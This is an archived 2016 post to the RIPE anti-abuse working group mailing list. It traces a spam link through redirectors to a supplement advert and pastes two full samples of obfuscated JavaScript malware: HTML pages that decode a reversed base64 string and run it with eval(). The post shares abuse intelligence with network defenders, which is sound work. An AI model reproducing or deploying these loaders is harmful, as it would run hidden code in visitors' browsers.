This archive is retained to ensure existing URLs remain functional. It will not contain any emails sent to this mailing list after July 1, 2024. For all messages, including those sent before and after this date, please visit the new location of the archive at https://mailman.ripe.net/archives/list/anti-abuse-wg@ripe.net/
[anti-abuse-wg] Malware/ransomware current live distribution IPs
- Previous message (by thread): [anti-abuse-wg] Malware/ransomware current live distribution IPs
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Ronald F. Guilmette
rfg at tristatelogic.com
Thu Jun 30 23:45:00 CEST 2016
In message <15749.1467320923 at server1.tristatelogic.com>, I wrote: >Anyway, following the link in the above spam payload/body gets you to >a trivial redirector... kindly hosted by Godaddy... which then attempts >to take you to this new URL: > > http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33 > >There is another redirection once you get there. The additional redirection takes you to: http://372-beauty.gooodweightlossgood.com/us/newd/scux/cla-safflower-oil/ Note however that the content being served up here is *only* an advert for a useless diet supplement (CLA Safflower Oil)... *not* a hunk of Javascript malware. I have yet to figure this out exactly. Some of the time, these sites serve up unambiguous (and heavily encoded) Javascript malware. (See below.) Other times, they don't. I confess that I haven't figured out the pattern yet, or even whether it is a time-dependent thing. Regards, rfg malware sample 1: ============================================================================== <!DOCTYPE html> <html> <head> <script language="javascript" type="text/javascript"> var _1Ol='==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';function _0l0(data){var OOIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=OOIlOI.indexOf(data.charAt(i++));h2=OOIlOI.indexOf(data.charAt(i++));h3=OOIlOI.indexOf(data.charAt(i++));h4=OOIlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function OOI(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(_0l0(OOI(_1Ol))); </script> </head> <body> </body> </html> ============================================================================== Malware sample 2: ============================================================================== <!DOCTYPE html> <html> <head> <script language="javascript" type="text/javascript"> var I1O='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';function OlI(data){var _011lOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i =0,enc='';do{h1=_011lOI.indexOf(data.charAt(i++));h2=_011lOI.indexOf(data.charAt(i++));h3=_011lOI.indexOf(data.charAt(i++));h4=_011lOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function _011(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(OlI(_011(I1O))); </script> </head> <body> </body> </html> ==============================================================================
- Previous message (by thread): [anti-abuse-wg] Malware/ransomware current live distribution IPs
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]